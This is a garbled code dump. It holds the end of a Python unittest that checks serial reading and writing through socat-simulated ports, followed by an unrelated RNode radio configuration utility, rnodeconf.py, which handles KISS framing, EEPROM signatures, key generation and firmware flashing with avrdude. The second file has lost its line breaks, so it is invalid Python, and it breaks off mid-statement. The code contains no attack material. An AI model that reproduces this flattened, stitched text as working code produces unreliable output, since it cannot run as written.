            raise NameError('Executable "socat" not found on path. Please refer '
                            'to installation guide to install socat.')

    ############################
    def _run_socat(self):
        """Internal: run the actual command."""
        verbose = '-d'
        write_port_params = 'pty,link=%s,raw,echo=0' % self.write_port
        read_port_params = 'pty,link=%s,raw,echo=0' % self.read_port

        cmd = [self.socat_path,
               verbose,
               # verbose,   # repeating makes it more verbose
               read_port_params,
               write_port_params,
               ]
        try:
            # Run socat process using Popen, checking every second or so whether
            # it's died (poll() is not None) or we've gotten a quit signal.
            logging.info('Calling: %s', ' '.join(cmd))
            socat_process = subprocess.Popen(cmd)
            # FIX: poll() returns the process's exit code, which is 0 (falsy)
            # on a clean exit; the old 'not poll()' test would busy-spin
            # forever in that case. Compare against None instead.
            while not self.quit_flag and socat_process.poll() is None:
                try:
                    socat_process.wait(1)
                except subprocess.TimeoutExpired:
                    pass
        except Exception as e:
            logging.error('ERROR: socat command: %s', e)

        # If here, process has terminated, or we've seen self.quit_flag. We
        # want both to be true: if we've terminated, set self.quit so that
        # 'run' loop can exit. If self.quit_flag, terminate process.
        if self.quit_flag:
            socat_process.kill()
            # TODO: Need to delete simulated ports!
        else:
            self.quit_flag = True
        logging.info('Finished: %s', ' '.join(cmd))

    ############################
    def run(self):
        """Create the virtual port with socat and start feeding it records
        from the designated logfile. If loop==True, loop when reaching end
        of input."""
        self.socat_thread = threading.Thread(target=self._run_socat, daemon=True)
        self.socat_thread.start()

    ############################
    def quit(self):
        """Signal the socat thread to shut down."""
        self.quit_flag = True


################################################################################
class TestSerialWriter(unittest.TestCase):

    ############################
    # Set up set up simulated serial in/out ports
    def setUp(self):
        warnings.simplefilter("ignore", ResourceWarning)

        # Set up simulated in/out serial ports
        self.tmpdir = tempfile.TemporaryDirectory()
        self.tmpdirname = self.tmpdir.name
        logging.info('created temporary directory "%s"', self.tmpdirname)

    ############################
    # Test a couple cases and the quiet flag
    def test_write(self):
        temp_port = self.tmpdirname + '/readline'
        temp_port_in = temp_port + '_in'
        sim_serial = SimSerialPort(temp_port)
        sim_serial.run()

        # Give it a moment to get started
        time.sleep(0.1)

        def _run_reader(port):
            # Read records back and check each against the sample data.
            reader = SerialReader(port)
            for line in SAMPLE_DATA.split('\n'):
                result = reader.read()
                logging.info('data: %s, read: %s', line, result)
                self.assertEqual(line, result)

        def _run_writer(in_port):
            # Write sample records, one per line.
            writer = SerialWriter(port=in_port)
            for line in SAMPLE_DATA.split('\n'):
                logging.info('wrote: %s', line)
                writer.write(line + '\n')

        def _run_read_specialcase(port):
            # Verify that non-ASCII/NUL-containing data survives a round trip.
            reader = SerialReader(port)
            res = reader.read()
            # FIX: the format string and argument list were mismatched
            # ('data: %s' with three args); merged into a single format.
            logging.info('data: %s, read: %s', '♥�♥\x00♥♥', res)
            self.assertEqual('♥�♥\x00♥♥', res)

        def _run_write_specialcase(in_port):
            writer = SerialWriter(in_port, quiet=True)
            writer.write('♥�♥\x00♥♥' + '\n')
            logging.info('wrote: %s', '♥�♥\x00♥♥')

        reader_thread = threading.Thread(target=_run_reader,
                                         kwargs={'port': temp_port})
        reader_thread.start()
        writer_thread = threading.Thread(target=_run_writer,
                                         kwargs={'in_port': temp_port_in})
        writer_thread.start()
        logging.info('Started threads')

        writer_thread.join()
        logging.info('Writer thread completed')
        reader_thread.join()
        logging.info('Reader thread completed')

        reader_thread = threading.Thread(target=_run_read_specialcase,
                                         kwargs={'port': temp_port})
        reader_thread.start()
        writer_thread = threading.Thread(target=_run_write_specialcase,
                                         kwargs={'in_port': temp_port_in})
        writer_thread.start()
        logging.info('Started threads')

        writer_thread.join()
        logging.info('Writer thread completed')
        reader_thread.join()
        logging.info('Reader thread completed')

        # Tell simulated serial port to shut down
        sim_serial.quit()


################################################################################
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('-v', '--verbosity', dest='verbosity',
                        default=0, action='count',
                        help='Increase output verbosity')
    args = parser.parse_args()

    LOGGING_FORMAT = '%(asctime)-15s %(filename)s:%(lineno)d %(message)s'
    logging.basicConfig(format=LOGGING_FORMAT)

    LOG_LEVELS = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG}
    args.verbosity = min(args.verbosity, max(LOG_LEVELS))
    logging.getLogger().setLevel(LOG_LEVELS[args.verbosity])

    # unittest.main(warnings='ignore')
    unittest.main()
rnodeconf.py
#!python3 # MIT License # # Copyright (c) 2018 Mark Qvist - unsigned.io # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
from time import sleep import argparse import threading import os import os.path import struct import datetime import time import math from urllib.request import urlretrieve from importlib import util program_version = "1.0.0" rnode = None rnode_serial = None rnode_baudrate = 115200 known_keys = [["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100e5d46084e445595376bf7efd9c6ccf19d39abbc59afdb763207e4ff68b8d00ebffb63847aa2fe6dd10783d3ea63b55ac66f71ad885c20e223709f0d51ed5c6c0d0b093be9e1d165bb8a483a548b67a3f7a1e4580f50e75b306593fa6067ae259d3e297717bd7ff8c8f5b07f2bed89929a9a0321026cf3699524db98e2d18fb2d020300ff39"]] ranges = { 0xA4: [410000000, 525000000, 14], 0xA9: [820000000, 1020000000, 17] } firmware_update_url = "https://github.com/markqvist/RNode_Firmware/raw/master/Precompiled/rnode_firmware_latest.hex" class RNS(): @staticmethod def log(msg): logtimefmt = "%Y-%m-%d %H:%M:%S" timestamp = time.time() logstring = "["+time.strftime(logtimefmt)+"] "+msg print(logstring) @staticmethod def hexrep(data, delimit=True): delimiter = ":" if not delimit: delimiter = "" hexrep = delimiter.join("{:02x}".format(c) for c in data) return hexrep @staticmethod def prettyhexrep(data): delimiter = "" hexrep = "<"+delimiter.join("{:02x}".format(c) for c in data)+">" return hexrep class KISS(): FEND = 0xC0 FESC = 0xDB TFEND = 0xDC TFESC = 0xDD CMD_UNKNOWN = 0xFE CMD_DATA = 0x00 CMD_FREQUENCY = 0x01 CMD_BANDWIDTH = 0x02 CMD_TXPOWER = 0x03 CMD_SF = 0x04 CMD_CR = 0x05 CMD_RADIO_STATE = 0x06 CMD_RADIO_LOCK = 0x07 CMD_DETECT = 0x08 CMD_READY = 0x0F CMD_STAT_RX = 0x21 CMD_STAT_TX = 0x22 CMD_STAT_RSSI = 0x23 CMD_STAT_SNR = 0x24 CMD_BLINK = 0x30 CMD_RANDOM = 0x40 CMD_FW_VERSION = 0x50 CMD_ROM_READ = 0x51 CMD_ROM_WRITE = 0x52 CMD_ROM_WIPE = 0x59 CMD_CONF_SAVE = 0x53 CMD_CONF_DELETE = 0x54 DETECT_REQ = 0x73 DETECT_RESP = 0x46 RADIO_STATE_OFF = 0x00 RADIO_STATE_ON = 0x01 RADIO_STATE_ASK = 0xFF CMD_ERROR = 0x90 ERROR_INITRADIO = 0x01 ERROR_TXFAILED = 0x02 
ERROR_EEPROM_LOCKED = 0x03 @staticmethod def escape(data): data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd])) data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc])) return data class ROM(): PRODUCT_RNODE = 0x03 MODEL_A4 = 0xA4 MODEL_A9 = 0xA9 ADDR_PRODUCT = 0x00 ADDR_MODEL = 0x01 ADDR_HW_REV = 0x02 ADDR_SERIAL = 0x03 ADDR_MADE = 0x07 ADDR_CHKSUM = 0x0B ADDR_SIGNATURE = 0x1B ADDR_INFO_LOCK = 0x9B ADDR_CONF_SF = 0x9C ADDR_CONF_CR = 0x9D ADDR_CONF_TXP = 0x9E ADDR_CONF_BW = 0x9F ADDR_CONF_FREQ = 0xA3 ADDR_CONF_OK = 0xA7 INFO_LOCK_BYTE = 0x73 CONF_OK_BYTE = 0x73 class RNode(): def __init__(self, serial_instance): self.serial = serial_instance self.timeout = 100 self.r_frequency = None self.r_bandwidth = None self.r_txpower = None self.r_sf = None self.r_state = None self.r_lock = None self.sf = None self.cr = None self.txpower = None self.frequency = None self.bandwidth = None self.detected = None self.eeprom = None self.major_version = None self.minor_version = None self.version = None self.provisioned = None self.product = None self.model = None self.hw_rev = None self.made = None self.serialno = None self.checksum = None self.signature = None self.signature_valid = False self.locally_signed = False self.vendor = None self.min_freq = None self.max_freq = None self.max_output = None self.configured = None self.conf_sf = None self.conf_cr = None self.conf_txpower = None self.conf_frequency = None self.conf_bandwidth = None def readLoop(self): try: in_frame = False escape = False command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" last_read_ms = int(time.time()*1000) while self.serial.is_open: if self.serial.in_waiting: byte = ord(self.serial.read(1)) last_read_ms = int(time.time()*1000) if (in_frame and byte == KISS.FEND and command == KISS.CMD_ROM_READ): self.eeprom = data_buffer in_frame = False data_buffer = b"" command_buffer = b"" elif (byte == KISS.FEND): in_frame = True command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" elif 
(in_frame and len(data_buffer) < 512): if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN): command = byte elif (command == KISS.CMD_ROM_READ): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_DATA): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_FREQUENCY): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz") self.updateBitrate() elif (command == KISS.CMD_BANDWIDTH): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz") self.updateBitrate() elif (command == KISS.CMD_FW_VERSION): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 2): self.major_version = command_buffer[0] self.minor_version = command_buffer[1] self.updateVersion() elif (command == KISS.CMD_TXPOWER): self.r_txpower = byte RNS.log("Radio reporting 
TX power is "+str(self.r_txpower)+" dBm") elif (command == KISS.CMD_SF): self.r_sf = byte RNS.log("Radio reporting spreading factor is "+str(self.r_sf)) self.updateBitrate() elif (command == KISS.CMD_CR): self.r_cr = byte RNS.log("Radio reporting coding rate is "+str(self.r_cr)) self.updateBitrate() elif (command == KISS.CMD_RADIO_STATE): self.r_state = byte elif (command == KISS.CMD_RADIO_LOCK): self.r_lock = byte elif (command == KISS.CMD_STAT_RX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_rx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_TX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_tx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_RSSI): self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET elif (command == KISS.CMD_STAT_SNR): self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25 elif (command == KISS.CMD_RANDOM): self.r_random = byte elif (command == KISS.CMD_ERROR): if (byte == KISS.ERROR_INITRADIO): RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")") elif (byte == KISS.ERROR_INITRADIO): RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")") else: RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")") elif (command == KISS.CMD_DETECT): if byte == KISS.DETECT_RESP: self.detected = True else: self.detected = False else: time_since_last = int(time.time()*1000) - last_read_ms if 
len(data_buffer) > 0 and time_since_last > self.timeout: RNS.log(str(self)+" serial read timeout") data_buffer = b"" in_frame = False command = KISS.CMD_UNKNOWN escape = False sleep(0.08) except Exception as e: raise e exit() def updateBitrate(self): try: self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2,self.r_sf)/(self.r_bandwidth/1000)) ) * 1000 self.bitrate_kbps = round(self.bitrate/1000.0, 2) except Exception as e: self.bitrate = 0 def updateVersion(self): minstr = str(self.minor_version) if len(minstr) == 1: minstr = "0"+minstr self.version = str(self.major_version)+"."+minstr def detect(self): kiss_command = bytes([KISS.FEND, KISS.CMD_DETECT, KISS.DETECT_REQ, KISS.FEND, KISS.CMD_FW_VERSION, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring spreading factor for "+self(str)) def initRadio(self): self.setFrequency() self.setBandwidth() self.setTXPower() self.setSpreadingFactor() self.setCodingRate() self.setRadioState(KISS.RADIO_STATE_ON) def setFrequency(self): c1 = self.frequency >> 24 c2 = self.frequency >> 16 & 0xFF c3 = self.frequency >> 8 & 0xFF c4 = self.frequency & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring frequency for "+self(str)) def setBandwidth(self): c1 = self.bandwidth >> 24 c2 = self.bandwidth >> 16 & 0xFF c3 = self.bandwidth >> 8 & 0xFF c4 = self.bandwidth & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring bandwidth for "+self(str)) def setTXPower(self): txp = 
bytes([self.txpower]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring TX power for "+self(str)) def setSpreadingFactor(self): sf = bytes([self.sf]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring spreading factor for "+self(str)) def setCodingRate(self): cr = bytes([self.cr]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring coding rate for "+self(str)) def setRadioState(self, state): kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state for "+self(str)) def setNormalMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_DELETE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def setTNCMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_SAVE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def wipe_eeprom(self): kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WIPE, 0xf8, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while wiping EEPROM") sleep(13); def write_eeprom(self, addr, byte): write_payload = b"" + bytes([addr, byte]) write_payload = KISS.escape(write_payload) kiss_command = bytes([KISS.FEND, 
KISS.CMD_ROM_WRITE]) + write_payload + bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while writing EEPROM") def download_eeprom(self): kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_READ, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state") sleep(0.2) if self.eeprom == None: RNS.log("Could not download EEPROM from device. Is a valid firmware installed?") exit() else: self.parse_eeprom() def parse_eeprom(self): if self.eeprom[ROM.ADDR_INFO_LOCK] == ROM.INFO_LOCK_BYTE: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend self.provisioned = True self.product = self.eeprom[ROM.ADDR_PRODUCT] self.model = self.eeprom[ROM.ADDR_MODEL] self.hw_rev = self.eeprom[ROM.ADDR_HW_REV] self.serialno = bytes([self.eeprom[ROM.ADDR_SERIAL], self.eeprom[ROM.ADDR_SERIAL+1], self.eeprom[ROM.ADDR_SERIAL+2], self.eeprom[ROM.ADDR_SERIAL+3]]) self.made = bytes([self.eeprom[ROM.ADDR_MADE], self.eeprom[ROM.ADDR_MADE+1], self.eeprom[ROM.ADDR_MADE+2], self.eeprom[ROM.ADDR_MADE+3]]) self.checksum = b"" self.min_freq = ranges[self.model][0] self.max_freq = ranges[self.model][1] self.max_output = ranges[self.model][2] try: self.min_freq = ranges[self.model][0] self.max_freq = ranges[self.model][1] self.max_output = ranges[self.model][2] except Exception as e: RNS.log("Exception") RNS.log(str(e)) self.min_freq = 0 self.max_freq = 0 self.max_output = 0 for i in range(0,16): self.checksum = self.checksum+bytes([self.eeprom[ROM.ADDR_CHKSUM+i]]) self.signature = b"" for i in range(0,128): self.signature = self.signature+bytes([self.eeprom[ROM.ADDR_SIGNATURE+i]]) checksummed_info = b"" + bytes([self.product]) + bytes([self.model]) + bytes([self.hw_rev]) + self.serialno + self.made digest = hashes.Hash(hashes.MD5(), backend=default_backend()) 
digest.update(checksummed_info) checksum = digest.finalize() if self.checksum != checksum: self.provisioned = False RNS.log("EEPROM checksum mismatch") exit() else: RNS.log("EEPROM checksum correct") from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import padding # Try loading local signing key for # validation of self-signed devices if os.path.isdir("./firmware") and os.path.isfile("./firmware/signing.key"): private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load local signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) public_bytes_hex = RNS.hexrep(public_bytes, delimit=False) vendor_keys = [] for known in known_keys: vendor_keys.append(known[1]) if not public_bytes_hex in vendor_keys: local_key_entry = ["LOCAL", public_bytes_hex] known_keys.append(local_key_entry) except Exception as e: RNS.log("Could not deserialize local signing key") RNS.log(str(e)) for known in known_keys: vendor = known[0] public_hexrep = known[1] public_bytes = bytes.fromhex(public_hexrep) public_key = load_der_public_key(public_bytes, backend=default_backend()) try: public_key.verify( self.signature, self.checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256()) if vendor == "LOCAL": self.locally_signed = True self.signature_valid = True self.vendor = vendor except Exception as e: pass if self.signature_valid: RNS.log("Device signature validated") else: RNS.log("Device signature 
validation failed") if self.eeprom[ROM.ADDR_CONF_OK] == ROM.CONF_OK_BYTE: self.configured = True self.conf_sf = self.eeprom[ROM.ADDR_CONF_SF] self.conf_cr = self.eeprom[ROM.ADDR_CONF_CR] self.conf_txpower = self.eeprom[ROM.ADDR_CONF_TXP] self.conf_frequency = self.eeprom[ROM.ADDR_CONF_FREQ] << 24 | self.eeprom[ROM.ADDR_CONF_FREQ+1] << 16 | self.eeprom[ROM.ADDR_CONF_FREQ+2] << 8 | self.eeprom[ROM.ADDR_CONF_FREQ+3] self.conf_bandwidth = self.eeprom[ROM.ADDR_CONF_BW] << 24 | self.eeprom[ROM.ADDR_CONF_BW+1] << 16 | self.eeprom[ROM.ADDR_CONF_BW+2] << 8 | self.eeprom[ROM.ADDR_CONF_BW+3] else: self.configured = False else: self.provisioned = False def device_probe(self): sleep(2.5) self.detect() sleep(0.1) if self.detected == True: RNS.log("Device connected") RNS.log("Firmware version: "+self.version) return True else: raise IOError("Got invalid response while detecting device") def main(): try: if not util.find_spec("serial"): raise ImportError("Serial module could not be found") except ImportError: print("") print("RNode Config Utility needs pyserial to work.") print("You can install it with: pip3 install pyserial") print("") exit() try: if not util.find_spec("cryptography"): raise ImportError("Cryptography module could not be found") except ImportError: print("") print("RNode Config Utility needs the cryptography module to work.") print("You can install it with: pip3 install cryptography") print("") exit() import serial try: parser = argparse.ArgumentParser(description="RNode Configuration and firmware utility. This program allows you to change various settings and startup modes of RNode. 
It can also flash and update the firmware, and manage device EEPROM.") parser.add_argument("-i", "--info", action="store_true", help="Show device info") parser.add_argument("-T", "--tnc", action="store_true", help="Switch device to TNC mode") parser.add_argument("-N", "--normal", action="store_true", help="Switch device to normal mode") parser.add_argument("-b", "--backup", action="store_true", help="Backup EEPROM to file") parser.add_argument("-d", "--dump", action="store_true", help="Dump EEPROM to console") parser.add_argument("-f", "--flash", action="store_true", help="Flash firmware and bootstrap EEPROM") parser.add_argument("-r", "--rom", action="store_true", help="Bootstrap EEPROM without flashing firmware") parser.add_argument("-u", "--update", action="store_true", help="Update firmware") parser.add_argument("-k", "--key", action="store_true", help="Generate a new signing key and exit") parser.add_argument("-p", "--public", action="store_true", help="Display public part of signing key") parser.add_argument("--freq", action="store", metavar="Hz", type=int, default=None, help="Frequency in Hz for TNC mode") parser.add_argument("--bw", action="store", metavar="Hz", type=int, default=None, help="Bandwidth in Hz for TNC mode") parser.add_argument("--txp", action="store", metavar="dBm", type=int, default=None, help="TX power in dBm for TNC mode") parser.add_argument("--sf", action="store", metavar="factor", type=int, default=None, help="Spreading factor for TNC mode (7 - 12)") parser.add_argument("--cr", action="store", metavar="rate", type=int, default=None, help="Coding rate for TNC mode (5 - 8)") parser.add_argument("--model", action="store", metavar="model", type=str, default=None, help="Model code for EEPROM bootstrap") parser.add_argument("--hwrev", action="store", metavar="revision", type=int, default=None, help="Hardware revision EEPROM bootstrap") parser.add_argument("--nocheck", action="store_true", help="Don't check for firmware updates online") 
parser.add_argument("--eepromwipe", action="store_true", help="Unlock and wipe EEPROM") parser.add_argument("--version", action="store_true", help="Print version and exit") parser.add_argument("port", nargs="?", default=None, help="serial port where RNode is attached", type=str) args = parser.parse_args() if args.version: print("rnodeconf "+program_version) exit(0) if args.public or args.key or args.flash or args.rom: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.asymmetric import padding if args.public: private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) except Exception as e: RNS.log("Could not deserialize signing key") RNS.log(str(e)) exit() if args.key: RNS.log("Generating a new signing key...") private_key = rsa.generate_private_key( public_exponent=65337, key_size=1024, backend=default_backend() ) private_bytes = private_key.private_bytes( encoding=serialization.Encoding.DER, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, 
format=serialization.PublicFormat.SubjectPublicKeyInfo ) os.makedirs("./firmware", exist_ok=True) if os.path.isdir("./firmware"): if os.path.isfile("./firmware/signing.key"): RNS.log("Signing key already exists, not overwriting!") RNS.log("Manually delete this key to create a new one.") else: file = open("./firmware/signing.key", "wb") file.write(private_bytes) file.close() RNS.log("Wrote signing key") RNS.log("Public key:") RNS.log(RNS.hexrep(public_bytes, delimit=False)) else: RNS.log("The firmware directory does not exist, can't write key!") exit() if args.port: if args.update: if not args.nocheck: try: RNS.log("Downloading latest firmware from GitHub...") os.makedirs("./update", exist_ok=True) urlretrieve(firmware_update_url, "update/rnode_update.hex") RNS.log("Firmware download completed") if os.path.isfile("./update/rnode_update.hex"): try: RNS.log("Updating RNode firmware for device on "+args.port) from subprocess import call flash_status = call(["avrdude", "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:update/rnode_update.hex"]) if flash_status == 0: RNS.log("Firmware updated") args.info = True else: exit() except Exception as e: RNS.log("Error while updating firmware") RNS.log(str(e)) else: RNS.log("Firmware update file not found") exit() except Exception as e: RNS.log("Could not download firmware update") RNS.log("The contained exception was: "+str(e)) exit() if args.flash: if os.path.isfile("./firmware/rnode_firmware.hex"): try: RNS.log("Flashing RNode firmware to device on "+args.port) from subprocess import call flash_status = call(["avrdude", "-P", args.port, "-p", "m1284p", "-c", "arduino", "-b", "115200", "-U", "flash:w:firmware/rnode_firmware.hex"]) if flash_status == 0: RNS.log("Done flashing") args.rom = True else: exit() except Exception as e: RNS.log("Error while flashing") RNS.log(str(e)) else: RNS.log("Firmware file not found") exit() RNS.log("Opening serial port "+args.port+"...") try: rnode_serial = 
serial.Serial( port = args.port, baudrate = rnode_baudrate, bytesize = 8, parity = serial.PARITY_NONE, stopbits = 1, xonxoff = False, rtscts = False, timeout = 0, inter_byte_timeout = None, write_timeout = None, dsrdtr = False ) except Exception as e: RNS.log("Could not open the specified serial port. The contained exception was:") RNS.log(str(e)) exit() rnode = RNode(rnode_serial) thread = threading.Thread(target=rnode.readLoop) thread.setDaemon(True) thread.start() try: rnode.device_probe() except Exception as e: RNS.log("Serial port opened, but RNode did not respond. Is a valid firmware installed?") print(e) exit() RNS.log("Reading EEPROM...") rnode.download_eeprom() if args.eepromwipe: RNS.log("WARNING: EEPROM is being wiped! Power down device NOW if you do not want this!") rnode.wipe_eeprom() if args.dump: RNS.log("EEPROM contents:") RNS.log(RNS.hexrep(rnode.eeprom)) exit() if args.backup: try: timestamp = time.time() filename = str(time.strftime("%Y-%m-%d_%H-%M-%S")) path = "./eeprom/"+filename+".eeprom" file = open(path, "wb") file.write(rnode.eeprom) file.close() RNS.log("EEPROM backup written to: "+path) except Exception as e: RNS.log("EEPROM was successfully downloaded from device,") RNS.log("but file could not be written to disk.") exit() if args.info: if rnode.provisioned: timestamp = struct.unpack(">I", rnode.made)[0] timestring = datetime.datetime.fromtimestamp(timestamp).strftime("%Y-%m-%d %H:%M:%S") sigstring = "Unverified" if rnode.signature_valid: if rnode.locally_signed: sigstring = "Validated - Local signature" else: sigstring = "Genuine board, vendor is "+rnode.vendor RNS.log("") RNS.log("Device info:") RNS.log("\tFirmware version:\t"+rnode.version) RNS.log("\tProduct code:\t\t"+bytes([rnode.product]).hex()) RNS.log("\tModel code:\t\t"+bytes([rnode.model]).hex()) RNS.log("\tHardware revision:\t"+bytes([rnode.hw_rev]).hex()) RNS.log("\tSerial number:\t\t"+RNS.hexrep(rnode.serialno)) RNS.log("\tFrequency range:\t"+str(rnode.min_freq/1e6)+" MHz - 
